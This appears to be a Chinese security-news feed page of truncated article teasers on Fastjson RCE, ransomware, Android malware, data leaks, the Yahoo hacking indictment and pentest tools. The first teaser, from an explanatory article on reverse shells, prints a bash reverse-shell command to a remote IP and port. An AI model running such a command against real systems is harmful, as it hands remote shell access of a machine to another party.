前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 Bash 这篇文章的起因就是网上给的Bash反弹shell的实现: 1 bash -i >& /dev/tcp/10.0.0.1/8080 …
Fastjson简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。 漏洞概要 2017年3月15日,Fastjson 官方发布安全公告,该公告介绍fastjson在1.2.24以及之前版本存在代码执行漏洞代码执行漏洞,恶意攻击者可利用此漏洞进行远程代码执行,从而进…
SSL安全套接层 SSL安全套接层(Secure Socket Layer)为Netspace所研发,用以保证在Internet上数据传输的完整性和保密性,目前版本为3.0,最新版本为TLS1.2安全传输层协议(Transport Layer Security)。TLS和SSL两者差别极小可以将其理解为SSL的更新版本。 通信过程 SSL介于应用层和网络层之间,位于传输层。应用的数据经过传输层中的SSL进行加密,并增加自己的SSL头,在将加密后的数据传向网络层。 其中具体的通信过程如下: 1. 客户端的浏览器向服务…
央视315晚会曝光了一些人脸识别验证有可能存在漏洞。这种虽然只是简单的机器识别,但实际在网络安全攻防中,机器学习的技术及相关模型已经投入实际运用了。类似这种人脸识别的问题,在网络攻防中防守者在使用,攻击者也在使用,如果攻击者面对机器学习的安全产品及系统,同样有可能利用这样的误判,发起致命的攻击。 央视发布预警称,社交网站比如微信、微博上po的照片有可能被恶意利用,进行人脸识别才能登陆的一些APP,从而存在一些风险。因此,央视提醒即使高科技背后也存在漏洞,人脸识别验证存在一些风险。 没有银弹 攻防进入机器学习对抗时…
在去年年底的时候,安全加报道过 联想手机A319 A6000出现漏洞 俄罗斯杀毒软件厂商发现一批手机固件中包含木马,今年3月10日, 安全公司Check Point在其blog上发表文章称 ,又发现两个大公司的38台安卓移动设备预装有恶意软件。 Checkpoint说手机中的恶意软件是在供应链中添加的 报告显示,各种恶意软件主要由信息窃取程序和拙劣的广告网络组成,这其中也包括所发现的移动勒索软件家族。有意思的是,尽管厂商提供的官方只读存储器(ROM)中并不存在恶意软件,但设备在用户收到前就已经感染了恶意软件。 该安…
卡巴斯基实验室研究员发现,近期一勒索软件家族PetrWrap,利用臭名昭著的Petya勒索软件加密用户数据,并动态修改了软件,控制其执行进程。不过勒索软件Petya也不是什么好东西。 Petya是去年3月出现的,当时立刻引起了研究人员的注意,因为它能够操控主引导记录(MBR),控制机器,而不像其他勒索软件那样加密用户的文件。不久,Petya与Mischa勒索软件狼狈为奸,演变为勒索软件即服务(RaaS)。 PetrWrap勒索软件绑架了Petya勒索软件 最新出现的这款勒索软件名为PetrWrap(Trojan-R…
微软发布了2017年3月安全通告,绿盟科技通告编号:NS17-02,本次通告的内容为是2017年03月14日(PST)安全更新,其中9个严重漏洞,都是远程代码执行漏洞,涉及IE、 Edge、Hyper-V、PDF库、SMB、 Uniscribe 、图形组件、Office、Exchange、IIS、ADFS、DVD Maker、DirectShow、XML Core Services及系统等等。 最容易被攻击的两个, 终于被修复了,大家赶紧安装吧 !安装方法见文末。 Microsoft Windows SMB 服务器…
据外媒报道,日前,谷歌捣毁了一个巨大的 Android 恶意软件家族 Chamois。据这家公司披露,这些恶意软件已经感染了上百万台设备。 Chamois 是一个对 Android 设备展开大范围广告欺诈的恶意软件。谷歌安全软件工程师 Bernhard Grill、Megan Ruthven、Xin Zhao 在官博上指出,他们是在常规广告流量质量评估中发现了 Chamois。 工程师对那些基于 Chamois 开发而出的恶意软件展开了分析,他们发现这些软件能够通过数种途径避开检测并尝试欺诈用户,于是决定采用 Ve…
据外媒报道,全世界排名第一的 ERP 软件公司 SAP 于近日修补了云商务平台 HANA 中的关键漏洞。 此前研究人员表明:SAP 修复的 27 个漏洞中,存在两个关键漏洞。其中一个是:攻击者在不需要经过任何验证的同时,就可以利用漏洞通过 HANA 的用户自助服务元件入侵整个系统;另一个则是:允许攻击者通过假冒系统中的高级用户来提升特权,从而窃取或删除敏感资料。 SAP HANA 是一个内存数据库,其中管理系统主要用于存储、检索和处理核心业务数据。所以,在过去一年中也吸引了越来越多的黑客人员对其进行攻击。 这批漏…
据外媒报道,黑客利用 Apache Struts 2 (Java Web服务器框架) 软件中新发现的漏洞,袭击了加拿大统计局的网站。目前,Candian 政府也证实该局网站已经被黑客入侵和离线超过两天。此外,当局还声称加拿大税务局( CRA ) 网站虽然还没有被黑客入侵,但它存在着和加拿大统计局网站同样的漏洞,因此当局在税收季节的高峰期关闭了该网站。 CRA 发言人帕克斯·萨姆森称,此次事件已经过去了 48 小时,CRA 还在与其他政府部门进行处理,寻求解决方案。CRA 也保证该解决方案会经过严格的测试,尽早恢复在…
据外媒报道,著名理论物理学家史蒂芬·霍金( Stephen Hawking )最近一直在谈论一个主题:人类的未来。 近期,霍金对从地外生命到人工智能(AI)等一些热门话题表达了自己的观点。对于后者,他表示出非常担忧。他并不反对开发人工智能技术,事实上,他曾经说过人工智能可能是我们文明历史上最重大的事件。但是像今天世界上其他许多科学家和思想家一样,霍金担心人工智能的崛起可能带来各种负面的副作用。 他早已就人工智能对中产阶级工作岗位的影响向我们发出了警告,并与特斯拉 CEO 埃隆·马斯克(Elon Musk)一起,呼吁…
前言 欢迎阅读第九份OnionScan报告。这些报告为大家提供最准确和最新的分析来教大家如何在现实世界中使用匿名网络。 在去年一年里,我们制作过一份关于洋葱服务状态的报告。 在这份报告中,我们将对由OnionScan编译的OnionSphere爬虫进行最新的分析。 注意:这项研究里有我们的支持者,我们希望我们在未来还能够继续为大家提供新的见解,研究和技术。 为了帮助我们这样做,请支持我们。 关于OnionScan的一年 在过去一年里,我们写了许多关于匿名,安全和暗网的报告。我们第一次报告包含了对暗网的犯罪评估,计数…
设备年年新,内核永不换。早该被淘汰的Linux内核版本,依然阴魂不散地扎根在各种各样的设备中,驱动着这些设备如同《行尸走肉》的丧尸游荡在世界各地。 Linux内核安全漏洞是新闻头条常客。最近又有一个隐身十年之久的严重内核漏洞被曝光了。但是,这到底代表着什么现实意义呢?为什么Linux内核安全很重要?老旧内核上的漏洞在众多设备中苟延残喘到底有什么影响? Linux是操作系统的王者 毋庸置疑,Linux系操作系统的流行度无人能出其右:3/4的IoT设备运行Linux;2/3的在线服务器用Linux;70%的平板基于安卓…
Stitch是一款基于Python的跨平台远程管理工具。由于其跨平台性,Stitch允许用户针对Windows, Mac OSX 或 Linux分别定制不同的payload。你可以根据自己的需要,来选择绑定的IP及监听端口。你还可以设置是否在目标系统启动时,向你发送系统信息邮件,以及是否开启键盘记录。 特点: 跨平台支持: 文件及命令自动执行 防病毒检测 可以打开或关闭显示屏监视器 隐藏或显示文件和目录 查看或修改hosts文件 查看系统所有环境变量 键盘记录器具有查看状态,启动,停止和将日志转储到主机系统的选项 …
据外媒报道,近日又发生一起女星私照大规模泄露事件,照片目前正在美国知名论坛4chan和Reddit上疯传,中招的女星包括艾玛·沃森(Emma Watson)、阿曼达·塞弗里德(Amanda Seyfried)等人。 据悉,从周二开始这些隐私照片便开始在网络上疯传,有网友爆料,艾玛·沃森泄露的私照多达上百张,部分照片含有成人内容,相关话题引发网友热议。未来几天可能会有更多女星隐私照片泄漏,此次泄漏事件才仅仅拉开“The Fappening 2.0”的序幕。 这不禁让人联想到2014年发生的“好莱坞艳照门(The Fa…
近日,网络安全专家兼微软区域主管Troy Hunt在博客上披露了他收到的一份多达52GB的数据库资料。内容包含近3400万美国人的个人身份信息(PII),且覆盖种类多样——从姓名、职位,邮箱、电话到公司盈利情况,雇员数量等林林总总,甚至还有国防部下辖军人档案信息! 千疮百孔 在安全状况频出的今天,发生数据泄漏的问题并不是什么稀罕事,不过本次爆料里还是有诸多看点值得一提。 首先,这批数据的来源是世界商业信息服务公司巨头——邓白氏(Dun&Bradstreet),不熟悉的同学可以去Google一下该公司的体量。…
E安全3月16日讯 据外媒报道,没有设置密码验证的备份服务器暴露了数千份美国空军的文件,包括高级军官的高度敏感个人文件资料。 安全研究人员发现,任何人都可以访问数GB的文件,因为联网备份服务未设置密码保护。 国外新闻网站查看文件后发现,这些文件包含一系列个人文件,例如4000多名军官的姓名、地址、职级和社保号。另一份文件罗列了数百名其它官员的背景调查(Security Clearance)等级,其中一些军官拥有能访问敏感信息和代号级别的“最高机密”许可。文件还包含数个电子表格,其中罗列了工作人员及其配偶的电话和联系…
3月16日消息,据今日美国报道,几乎所有国家都在从事某种形式的网络间谍活动,但俄罗斯却能从中脱颖而出。这并非是因为该国出动了情报人员或军方人员,而是将网络袭击外包给繁荣的地下网络黑客。虽然这种情况在情报界早已众所周知,但在雅虎网络袭击案件中俄罗斯情报人员受到指控,这个秘密最终被公之于众。 美国前国土安全部长迈克尔·切尔托夫(Michael Chertoff)在接受电话采访时称:“从利用犯罪组织充当合伙人的角度来看,俄罗斯做得最好。”指控4名俄罗斯人对雅虎发动大规模网络袭击,是美国政府首次正式承认切尔托夫所谓的“邪恶…
Windows和Android平台为何频频成为黑客攻击的目标?最重要的原因是平台用户数量。近年来由于使用Gmail邮件服务的用户越来越多,也日益成为钓鱼邮件的重点攻击目标。援引外媒Lifehacker报道,在今年早些时候Wordfence公司的网络安全专家发现了一种新型骗局,重点针对那些通过浏览器访问邮件帐号的Gmail用户。 这个钓鱼邮件会伪装成为Google用于标记PDF或者WORD文档的图片,不过这些图片会嵌入在邮件正文中。当用户点击之后,就会引导受害者至“Google登陆页面”。 尽管这个页面和Google…
E安全3月16日讯 安全公司Check Point表示, Hancitor下载器首次挤进最活跃恶意软件家族排行前5名。 Hancitor下载器可以在被感染设备上安装银行木马和勒索软件。该软件的全球影响力在过去三个月里增加了2倍以上,排名荣升第至22位。Hancitor也被称为Chanitor,通过网络钓鱼电子邮件伪装成语音邮箱、传真或发票,通常作为启用宏的Office文档散播。 最活跃的恶意软件家族 总体而言,排名前三的恶意软件家族表明,黑客在利用各种攻击媒介和策略攻击技术。这些威胁影响感染链的所有环节,包括通过僵…
E安全3月16日讯 据报道,攻击者入侵了一款网络社交APP“许愿骨”(Wishbone)。Wishbone在青少年中相当热门。攻击者从中窃取了220万个电子邮箱和28.7万个手机号码。 该社APP允许用户创建简单的投票。随着时间的推移,这款应用受到越来越多的青少年青睐,被App Annie (应用数据和应用市场数据分析的行业领导者)列为美国iPhone 10大最受欢迎的社交网络应用之一,显然Wishbone拥有大量用户群体。然而此次数据泄露事件或给用户带来烦恼。 在这一次泄密的信息其中有一个样本包含200个账户,其…
E安全3月16日讯 近日美国商业服务巨头Dun&Bradstreet的52GB数据库遭到泄露,这套数据库中包含超过3300万条记录,具体包括政府部门与大型企业客户,有证据证实,其曾面向营销厂商出售过。 这套数据库整体约为52 GB,包含3380万条惟一电子邮箱地址与成千上万条企业员工联系信息,其影响范围已经占据美国企业从业者的可观比例。 商业服务巨头Dun & Bradstreet证实是该数据库拥有者,并透露这是2015年一笔1.25亿美元的交易收购NetProspex公司所获得。 这套数据库包含九十条字段…
据外媒(CNET)报道,美国司法部于周三指控四名黑客涉嫌发动对雅虎的网络攻击并窃取信息。其中两名黑客被指认为俄罗斯联邦安全局——相当于美国的FBI——下属间谍,另外两位被认为是雇佣罪犯。 间谍雇佣黑客发动技术攻击,以求获得有关政治人物的丑闻信息。四人被控以电信诈骗、盗取商业机密和经济间谍罪名。 加拿大黑客Karim Baratov(哈萨克斯坦裔)于本周二被捕。其他三名俄罗斯黑客或将受保护免受引渡。 “(俄罗斯)联邦安全局的参与加剧了事情的严重性。”代理助理检察长麦克考德(Mary McCord )在星期三的新闻发布…
渗透测试人员其实都知道,只要能够直接接触到目标设备,并且选对了工具,那么任何设备都会成为“待宰的羔羊”。早在2005年,Hak5就已经研发出了一款简单又暴力的渗透测试工具。随着BashBunny的问世,渗透测试可能又更进了一步。先上购买地址:【点我购买】 组合各种USB设备的攻击方式 按照Hak5自己的说法,这款设备是“世界上最先进的USB攻击工具”。我们就来看看这款工具究竟有哪些本领。 这款设备“打开”的攻击面的确比先前的设备大了很多。渗透测试攻击和IT自动化工作,对Bash Bunny而言几秒内就能完成。通过各…
今天微软宣布启动又一波Bug Bounty活动,不过这次是面向使用桌面Windows应用的Office Insider用户。这个项目将会持续3个月时间,将会在6月15日结束。 本次活动微软主要是为了寻找三种类型的漏洞,首先是在受保护视图下打开未信任的文档,哪怕在该模式生效下也能出现提权的漏洞。另一个是能够绕过阻止宏执行的安全策略,最后一个是绕过Outlook的自动附件阻止策略。 本次有奖活动会根据发现的漏洞予以现金奖励,最高能够达到15000美元,奖金间隔为500美元。保护模式下的提权漏洞奖金在9000美元到150…